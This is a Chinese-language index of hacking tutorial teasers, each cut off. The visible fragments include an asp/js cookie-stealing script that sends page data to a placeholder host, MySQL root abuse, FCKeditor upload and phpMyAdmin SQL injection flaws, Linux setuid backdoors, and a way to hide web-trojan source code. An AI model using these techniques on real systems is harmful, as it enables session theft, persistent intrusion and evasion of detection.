安全教程
-
asp+js 偷取Cookies源代码
偷取Cookie,通过以下脚本引入一个js,document.write("<script src=XX.js></script>"),然后js内容为: var code; var target = "http://www.xxx.net/cookie.asp?"; info=escape(document.location+"@@@"+d...
-
linux下mysql 5.x得到root密码后的另外一种利用方式
Author: Sh@dow 刚才在卫生间蹲着的时候忽然想到这个问题,mysql5.x for linux下面有一个函数,可以帮助我们干很多事情,这个函数4。x下面貌似没,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的明天再看看函数手册,再装一个实验一下。mysql 5.x里面...
-
FCKeditor JSP版漏洞
FCKeditor的JSP版漏洞 http://www.iwyv.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F http://www.iwyv.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/conne...
-
linux下留本地后门的两个方法
方法一:setuid的方法,其实8是很隐蔽。看看过程:[root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linu...
-
phpMyAdmin table参数SQL注入漏洞
影响版本: phpMyAdmin phpmyadmin 3.x phpMyAdmin phpMyAdmin 2.11.x 漏洞描述: BUGTRAQ ID: 32720 phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。 phpMyAdmin的./phpmyadmin/libraries/db_table_exists.lib.php文件中没有正确地过滤table参数: $_result =...
-
mysql 读取文件的几种方式及应用
章出处:C.R.S.T 作者:sai52[B.H.S.T] 今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只...
-
教你让网马原代码隐藏的方法
网马再怎么加密,都有可能被反加密的可能,为了更好保护自己的代码,看看这办法,但这办法对付不了抓包分析,数据包抓取也是没办法的目的:查看源代码没有内容,查看缓冲区也没内容1.asp文件写法<%'禁止缓冲区 Response.CacheControl = "no...